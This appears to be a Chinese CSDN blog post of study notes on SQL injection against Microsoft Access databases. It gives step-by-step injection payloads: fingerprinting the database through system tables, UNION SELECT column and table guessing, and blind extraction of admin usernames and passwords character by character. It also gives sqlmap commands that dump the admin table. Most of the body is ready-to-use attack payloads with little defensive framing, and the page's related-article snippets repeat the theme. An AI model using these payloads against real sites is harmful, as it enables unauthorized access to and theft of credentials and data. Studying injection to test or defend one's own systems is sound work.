Access数据库注入

最新推荐文章于 2023-10-16 11:47:29 发布
最新推荐文章于 2023-10-16 11:47:29 发布
阅读量608 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55802741/article/details/119045689
版权

各个数据库独有表名:

msssql:sysobjects
mysql:infomation——schema
access:mssysobjects
Oracle:sys.user_table

判断数据库:

手工查数据库类型方法:

and (select count (*) from 独有表)>0

方法一:

在地址栏上显示的连接所带的参数后面加些特殊符号,看它的报错信息,如
http://www.**.com?id=1’
则回返回错误,如果是Microsoft JET Database Engine错误’80040e14’的话,则说明网站所用的数据库是Access数据库。

方法二:

http://wwww.***.com?id=1 and (select count(*) from sysobjects)>0  //sysobjects 是SQL表,返回正常则为MSSQL数据库
http://www.***.com/id=1 and (select count(*) from msysobjects)>0  //msysobjects 是access,返回权限不足 access数据库

如果加sysobjects的SQL语句后,网页显示正常,
加msysobject的SQL语句后,网站显示不正常,则说明用的是SQLServer数据库。
如果加sysobjects和加msysobjects的SQL语句后,网页显示都不正常,或者加msysobject后的网页显示正常,则说明是ACCESS数据库。
但首先得允许访问系统表。

exists(select*from msysobjects)//如果这条语句正确,说明是Access数据库

MSysObjects表中包含了所有数据库对象。但遗憾的是,Access数据库默认不允许访问这些表。

1.判断注入点

2.确定列名的数目

语句order by 列名数

3.猜表名

1.1 语句 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from 表名

1.2 语句 and exists (select * from 表名) //返回正常则说明存在admin数据表

4.猜列名

1.1 语句 UNION SELECT 1,2,列名一,4,5,6,7,8,9,10,11,12,13,14,列名二,16,17,18,19,20,21,22 from 表名

1.2 语句 and exists (select 列名 from 表名)

5.爆数据(先确定长度)

1.1 语句 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

1.2 确定admin列第一行数据的长度

语句 and (select top 1 len(列名) from 表名) =5 //top 1子句含义:查询结果只显示首条记录,len()取长度,返回正常,则说明admin第一行的数据长度为5

猜解admin第一列数据内容:

语句 and (select top 1 asc(mid(列名,n,1)) from 表名) =97 //返回正常

Sqlmap注入Access数据库:

爆出access数据库存在的表:sqlmap -u "xxx"  --tables

爆出admin数据库中的列名:sqlmap -u "xxx" -T admin --columns

爆出admin表下username列的所有数据:sqlmap -u "xxx" -T admin -C username --dump-all

.loser.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Access数据库注入高级玩法.pdf
07-13
Access 数据库注入高级玩法 Access 数据库注入高级玩法是一种高级的数据库攻击技术,旨在攻击 Access 数据库,获取敏感信息。以下是该技术的详细解释和应用: 1. 基础篇猜解表名 猜解表名是 Access 数据库注入的...
Mssql存储过程大杂烩
weitd的专栏
09-17 93
1.语法 CREATE PROC [ EDURE ] procedure_name [ ; number ] [ { @parameter data_type } [ VARYING ] [ = default ] [ OUTPUT ] ] [ ,...n ] [ WITH { RECOMPILE | ENCRYPTION | RECOMPILE...
Access注入
zhuangsle的博客
08-25 679
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
Access注入详细笔记
weixin_46007361的博客
10-10 2109
Access注入
渗透测试---手把手教你SQL注入(7)---Access数据库注入
最新发布
weixin_52796034的博客
10-16 503
在讨论SQL注入中的Access数据库注入时,首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统,可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境,但它也可以用于大型企业和互联网应用。 此外,Access与其他数据库管理系统(如MySQL、SQL Server等)在处理SQL注入方面有所不同。
Access数据库手工注入
IerkeU的博客
11-28 1721
ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具。 access数据库结构? access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。 access注入基本流程? 判断有没有注入点 猜解表名 猜解字段 猜解管理员ID值 猜解用户名和密码长度 猜解用户名和密码 ASP的
Access数据库注入高级玩法[参考].pdf
10-19
Access数据库注入是一种安全漏洞利用技术,通常发生在Web应用程序中,当应用程序不恰当地与Access数据库交互时,攻击者可以通过输入特定的SQL语句来获取敏感信息或执行非法操作。以下是一些高级Access数据库注入技巧...
Access数据库注入高级玩法
03-03
Access数据库注入高级玩法
kali linux 下sqlmap注入ACCESS数据库.doc
03-04
Kali Linux 下 SQLmap 注入 ACCESS 数据库 Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面...
PHP连接access数据库
12-18
2. **性能**:Access数据库在处理大量数据时性能较差,对于大型应用来说,更推荐使用MySQL、PostgreSQL等关系型数据库。 3. **安全**:直接使用ADO可能存在SQL注入风险,应当使用参数化查询或预处理语句来提高安全性...
SQL注入Access注入 (手工)
12-14
什么是SQL注入? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 —-百度百科 寻找注入点 首先呢,在网站中寻找传递参数的页面,也就是寻找注入点。 判断注入 找到页面(注入点)之后呢,我们需要判断当前页面是否存在注入 传统的方法是: 语句 状态 链接后面加 ’ 报错 and 1=1 正常 and 1=2 报错 or 1=2 正常 or 1=1
彻底隐藏ACCESS文件所有的基本表包括链接表及系统表函数
weizw55的专栏
12-30 1593
彻底隐藏所有的基本表包括链接表及系统表函数
sql注入-access数据库-总结
weixin_42109829的博客
12-15 1075
Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 判断注入点 1.这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:40000/new_list.asp?id=1 2.判断注入点标准三连 ’ ~ and 1 ~ and 0 http://219.153.49.228:47744/new_list.asp?id=1' #页面报错 http://219.153.49.228:47744/ne
ACCESS注入
qq_57307348的博客
02-13 2356
目录 access数据库结构 access数据库类型判断 access数据库需要掌握的几个函数 access注入基本流程 access查询方法 联合查询 布尔型盲注 access数据库结构 表名---->列名---->内容数据 不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有若干张表。 access数据库类型判断 根据url文件后缀初步判断,一般asp和access数据库连用,通过and (select count(*) from msys
access数据库注入
weixin_33850015的博客
06-22 148
access数据库渐渐的被很多人遗忘。 而大部分安全人员也对access数据库也不感冒。 最近在西晋学院玩了玩它的web题目,没想到在西晋上面看到不少的asp的题。其中不乏有数据库注入的。 access数据库并不像mysql那样方便,可以拥有information_schema这个包含数据各种数据库,表以及字段信息的“新华字典”。 虽然有一个msyso...
Access数据库SQL注入小结
HappyOrange2014的专栏
11-10 1万+
Access数据库SQL注入小结这里总结一下学到的Access数据库注入的知识点。
Access数据库注入方法
热门推荐
谢公子的博客
01-14 1万+
目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软Office家族的一个成员。Acces...
Access数据库注入详解
weixin_46601374的博客
04-03 527
一个人再冷酷无情,他曾经都单纯过。能有这样的结果,都是被逼的。 渗透入坑学废集前言注入漏洞分析网站分类常见数据库网站访问模型漏洞成因注入漏洞是怎么样形成的?常见的注入流程注入危害ACCESS数据库注入详解ACCESS数据库介绍优势缺陷asp链接access数据库打开工具数据库查询分析Access数据库注入原理漏洞判断判断数据库注入ACCESS注入番外篇测试站点常用注入工具Access数据库高级玩法偏移注入用*代替字段长度带入计算公式偏移注入跨库查询利用access写入文件利用Access注入执行系统命令挖
实战初级SQL注入-access
edegod的博客
02-19 4588
这是我的第一篇文章,如有不好的地方还请多多担待,才开始接触网络安全,小白一个。学习过程中遇到了非常多的问题,过程中发现很少有关于纯新手的文章,入门很难,所以我写了这篇文章,带大家能够更简单的理解网络世界。话简单说,接下来是我看小迪渗透视频所学到的,我整理了一下,一步一步很详细,基本谁都能看懂。搭建虚拟机,安装镜像就跳过了,网上也说的很明白,至于特定的软件安装,百度也有详细的解决办法。SQL注入个人...
sql注入access数据库
10-09
对于Access数据库,防止SQL注入攻击的关键是使用化查询来处理用户输入的数据,而不直接拼接SQL语句。参数化查询可以有效防止恶意用户输入恶意代码进行攻击。 下面是一个示例代码,展示了如何使用C#和ADO.NET执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值